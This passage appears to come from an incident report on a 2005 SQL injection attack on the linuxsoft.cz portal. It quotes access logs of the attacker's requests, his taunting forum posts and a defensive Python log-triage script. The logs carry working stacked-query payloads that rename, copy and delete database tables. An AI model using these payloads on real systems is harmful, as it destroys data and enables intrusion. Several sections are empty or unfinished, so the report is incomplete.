212.158.128.159 - - [05/Dec/2005:14:46:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20kategorie_sw%20LIMIT%201) HTTP/1.0" 200 54806 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:47:07 +0100] "GET /script_list.php?id_kategory=(SELECT%20name%20FROM%20kategorie_sw%20LIMIT%201) HTTP/1.0" 200 54800 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:47:23 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20articles%20LIMIT%201) HTTP/1.0" 200 54818 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:48:07 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:27 +0100] "GET / HTTP/1.0" 200 71779 "http://www.linuxsoft.cz/script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201)" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:28 +0100] "GET /img/banner_468-60-2.gif HTTP/1.0" 200 44573 "http://www.linuxsoft.cz/" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:37 +0100] "GET /script_list.php?id_kategory=(SELECT%20title%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54796 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:55:48 +0100] "GET /script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54556 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:56:21 +0100] "GET /script_list.php?id_kategory=(SELECT%20popis_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54814 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:56:38 +0100] "GET /script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201) HTTP/1.0" 200 54556 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"
212.158.128.159 - - [05/Dec/2005:14:59:23 +0100] "GET / HTTP/1.0" 200 71678 "http://www.linuxsoft.cz/script_list.php?id_kategory=(SELECT%20popiska_cz%20FROM%20article%20LIMIT%201)" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8) Gecko/20051025 Firefox/1.5"

A little later the attacker probably tried to conceal his identity by routing the communication with our server through some anonymous proxy in Vietnam.

203.162.27.200 - - [05/Dec/2005:14:25:58 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57422 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:31:06 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20kategorie_sw%20TO%20kategorie_sw_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54974 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:33:06 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20users%20TO%20users_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54946 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:33:50 +0100] "GET /script_list.php?id_kategory=157));%20RENAME%20TABLE%20article%20TO%20article_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54954 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:35:56 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20RENAME%20TO%20kategorie_sw_sql_injection_lol;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54966 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:39:59 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20DROP%20COLUMN%20id;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54914 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:43:36 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20kategorie_sw%20SET%20id%20=%20NULL;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55172 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:45:26 +0100] "GET /script_list.php?id_kategory=157));%20ALTER%20TABLE%20kategorie_sw%20DROP%20CONSTRAINT%20category_parent;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54948 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:49:17 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20kategorie_sw_sql_inj_lool%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55354 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:51:07 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20kategorie_sw_sql_inj_lool;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57435 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:52:46 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20article_sql_inj_lool%20FROM%20article;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55324 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:53:11 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20users_sql_inj_lool%20FROM%20users;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55312 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:14:59:30 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=Kdo HTTP/1.0" 200 54868 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:00:42 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=%22Kdo%20neumi%20programovat%20at%20neprogramuje... %20Doporucuji%20precist%20neco%20o%20SQL%20Injection%22;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55078 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:02:44 +0100] "GET /script_list.php?id_kategory=157));%20UPDATE%20articles%20SET%20popiska_cz=%22Kdo%20neumi%20programovat%20at%20neprogramuje... %20Doporucuji%20precist%20neco%20o%20SQL%20Injection%22;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55078 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:04:22 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20articles;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54868 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:05:13 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20article;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57415 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:06:06 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20users;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55120 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:06:51 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55138 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:08:31 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20polozka_sw_sql_inj_lool%20FROM%20polozka_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 55342 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:09:43 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20FROM%20polozka_sw_sql_inj_lool;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57433 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:11:10 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20polozka_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 57418 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:12:17 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54353 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:14:01 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20wallpapers_sql_inj_lool%20FROM%20wallpapers;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54557 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:15:00 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20wallpapers;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56633 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:16:40 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54359 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:18:03 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20distribuce_sql_inj_lool%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54557 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:19:00 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54399 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:19:30 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54359 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:21:45 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20relace_distro_balicek_sql_inj_lool%20FROM%20relace_distro_balicek;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 54623 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:22:41 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20relace_distro_balicek;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56644 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:23:53 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20distribuce;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 56633 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:24:48 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20kategorie_sw;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 53554 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:27:14 +0100] "GET /script_list.php?id_kategory=157));%20SELECT%20*%20INTO%20TABLE%20skripty_distro_balicek_sql_inj_lool%20FROM%20skripty;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 53784 "-" "Wget/1.10.2 (Red Hat modified)"
203.162.27.200 - - [05/Dec/2005:15:28:06 +0100] "GET /script_list.php?id_kategory=157));%20DELETE%20FROM%20skripty;%20SELECT%20157%20WHERE%201=((1 HTTP/1.0" 200 52988 "-" "Wget/1.10.2 (Red Hat modified)"
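The entries above can be triaged mechanically. The following is an added example, not part of the original report: it decodes the `id_kategory` parameter, lists the statements stacked after the numeric id, and reports tables that were deleted without a preceding copy. The function names, the documentation address 203.0.113.7 and the shortened UPDATE text are assumptions made for the example.

```python
import re
from urllib.parse import unquote

# Host, timestamp, URL of a combined-log entry; a raw space in the URL is tolerated.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.*?) HTTP/\d\.\d" \d{3} ')
# Statements stacked after the numeric id: verb, target table, source table.
STMT_RE = re.compile(r";\s*(?:(DELETE)\s+FROM\s+(\w+)|(UPDATE)\s+(\w+)"
                     r"|SELECT\s+\*\s+(INTO)\s+TABLE\s+(\w+)\s+FROM\s+(\w+))", re.I)

def injected_statements(line, param="id_kategory"):
    """Return [(timestamp, host, verb, table, source_table)] for one log line."""
    m = LINE_RE.match(line)
    if not m:
        return []
    host, ts, url = m.groups()
    events = []
    for pair in url.partition("?")[2].split("&"):
        key, _, raw = pair.partition("=")
        value = unquote(raw)
        if key != param or value.isdigit():  # a plain integer is the expected input
            continue
        for d, d_tab, u, u_tab, c, c_tab, c_src in STMT_RE.findall(value):
            verb, table = ("COPY", c_tab) if c else ((d or u).upper(), d_tab or u_tab)
            events.append((ts, host, verb, table, c_src or None))
    return events

def deleted_without_copy(lines):
    """Tables hit by DELETE with no earlier SELECT ... INTO TABLE copy in `lines`."""
    copied, lost = set(), []
    for line in lines:
        for _ts, _host, verb, table, source in injected_statements(line):
            if verb == "COPY":
                copied.add(source)
            elif verb == "DELETE" and table not in copied and table not in lost:
                lost.append(table)
    return lost

def entry(clock, url):  # constructed entry; 203.0.113.7 is a documentation address
    return (f'203.0.113.7 - - [05/Dec/2005:{clock} +0100] "GET {url} HTTP/1.0" '
            '200 54868 "-" "Wget/1.10.2 (Red Hat modified)"')

Q, TAIL = "/script_list.php?id_kategory=157));%20", ";%20SELECT%20157%20WHERE%201=((1"
SAMPLE = [  # constructed requests modelled on the log above
    entry("15:00:42", Q + "UPDATE%20articles%20SET%20popiska_cz=%22a... %20b%22" + TAIL),
    entry("15:04:22", Q + "DELETE%20FROM%20articles" + TAIL),
    entry("15:08:31", Q + "SELECT%20*%20INTO%20TABLE%20polozka_sw_sql_inj_lool%20FROM%20polozka_sw" + TAIL),
    entry("15:11:10", Q + "DELETE%20FROM%20polozka_sw" + TAIL),
    entry("15:37:19", "/sw_list.php?id_kategory=80"),
]
```

A COPY event only shows that a copy statement was requested; whether the copy table exists and is complete has to be checked in the database itself.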

The attacker then creates a user account in order to post a comment in the discussion[2]:

Date: 5.12.2005 15:46
Subject: SQL injection
From: Newim
A wise man once said "Don't do what you don't know how to do". The programmers of this portal should take that to heart... For their spare moments I recommend that the programmers have the term SQL Injection explained to them. Btw: If I were you, I wouldn't delete the database, and I'd take a look at the list of tables.

The relevant logs:

203.162.27.200 - - [05/Dec/2005:15:29:45 +0100] "GET / HTTP/1.1" 200 56663 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:29:48 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:29:49 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:30:14 +0100] "GET / HTTP/1.1" 200 509 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:14 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:15 +0100] "GET / HTTP/1.1" 200 56656 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:17 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:31:35 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 52726 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:07 +0100] "GET / HTTP/1.1" 200 56530 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:09 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:10 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:32:19 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 52726 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:33:26 +0100] "GET /user_edit.php?reg_tlacitko=1 HTTP/1.1" 200 45168 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:35:45 +0100] "POST /user_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/user_edit.php?reg_tlacitko=1" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:35:49 +0100] "GET /user_edit.php?error_array[0]=120&user_id=&uzivatelske_jmeno=sds&passwd_orig=sdssds&name_user=Newim&birth_year=&pref_distro=&about_user=&home_page=&email=newim@linux.org HTTP/1.1" 200 45382 "http://www.linuxsoft.cz/user_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:16 +0100] "POST /user_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/user_edit.php?error_array[0]=120&user_id=&uzivatelske_jmeno=sds&passwd_orig=sdssds&name_user=Newim&birth_year=&pref_distro=&about_user=&home_page=&email=newim@linux.org" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:19 +0100] "GET /user_edit.php?user_id=6812&error_array[0]=1 HTTP/1.1" 200 44812 "http://www.linuxsoft.cz/user_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:36:52 +0100] "GET /img/sipka2.png HTTP/1.1" 200 160 "http://www.linuxsoft.cz/user_edit.php?user_id=6812&error_array[0]=1" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:37:19 +0100] "GET /sw_list.php?id_kategory=80 HTTP/1.1" 200 52387 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:37:45 +0100] "POST /login.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/prispevek_edit.php?type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-3)"
203.162.27.200 - - [05/Dec/2005:15:38:18 +0100] "GET / HTTP/1.1" 200 56538 "-" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:19 +0100] "GET /css/eshop.css HTTP/1.1" 200 3249 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:21 +0100] "GET /css/style.css HTTP/1.1" 200 8230 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:39 +0100] "POST /login.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:38:50 +0100] "GET /prispevek_edit.php?type_item=8 HTTP/1.1" 200 54277 "http://www.linuxsoft.cz/" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:43:08 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 54580 "http://www.linuxsoft.cz/prispevek_edit.php?type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:43:55 +0100] "POST /prispevek_edit.php HTTP/1.1" 200 54548 "http://www.linuxsoft.cz/prispevek_nahled.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:07 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 54583 "http://www.linuxsoft.cz/prispevek_edit.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:39 +0100] "POST /prispevek_save.php HTTP/1.1" 302 5 "http://www.linuxsoft.cz/prispevek_nahled.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:46:48 +0100] "GET /poradte_soft_list.php?id_prispevku=5167&error_array[1]=1 HTTP/1.1" 200 67809 "http://www.linuxsoft.cz/prispevek_save.php" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:47:11 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 55965 "http://www.linuxsoft.cz/poradte_soft_list.php?id_prispevku=5167&error_array[1]=1" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [05/Dec/2005:15:47:43 +0100] "GET /user_page.php?user_id=6812 HTTP/1.1" 200 54764 "http://www.linuxsoft.cz/diskuze.php?id_vazba=5167&type_item=8" "ELinks/0.10.3 (textmode; Linux; 156x54-2)"
203.162.27.200 - - [06/Dec/2005:14:52:37 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 73572 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [06/Dec/2005:14:55:15 +0100] "GET /diskuze.php?id_vazba=5167&type_item=8 HTTP/1.1" 200 73572 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [06/Dec/2005:15:06:32 +0100] "POST /prispevek_nahled.php HTTP/1.1" 200 55579 "-" "Links (2.1pre7; Linux 2.4.20-petr i686; 156x54)"
203.162.27.200 - - [07/Dec/2005:14:33:49 +0100] "GET /img/flag-cz.png HTTP/1.1" 200 467 "http://www.linuxsoft.cz/shop/?produkt=3854" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

Incidentally, the next day the attacker, again connected through an anonymous proxy, got in touch once more, as if to stress that he had not deleted the database but only moved it:

Date: 6.12.2005 15:07
Subject: Re: Backups
From: Newim
Well, if you had looked PROPERLY, the data from all the deleted tables were copied.

Damage caused

Conclusion

The following people contributed to this document:

Appendices

(*) SQL injection

These attacks target the part of a web application that holds its data, the database: the attacker gets the attacked application into a state in which it accepts his input as SQL queries.

In our case it was ...

For more, see for example [3].

(**) anonymous proxy server

A server that relays communication, for example over the HTTP protocol. The visitor does not communicate with the target server directly but leaves the communication to the proxy server, which sends the results back to him. From the target server's point of view the visitor therefore appears to be the proxy server, which gives the real visitor partial anonymity. If, in addition, this server is located in a country where the logs are unlikely to be handed over, or if logs are not kept or are deleted straight away, its anonymity is almost complete.

For more, see for example [4].

References

[1] http://www.linuxsoft.cz
[2] http://www.linuxsoft.cz/diskuze.php?id_vazba=5167&type_item=8
[3] http://en.wikipedia.org/wiki/Sql_injection
[4] http://en.wikipedia.org/wiki/Proxy_server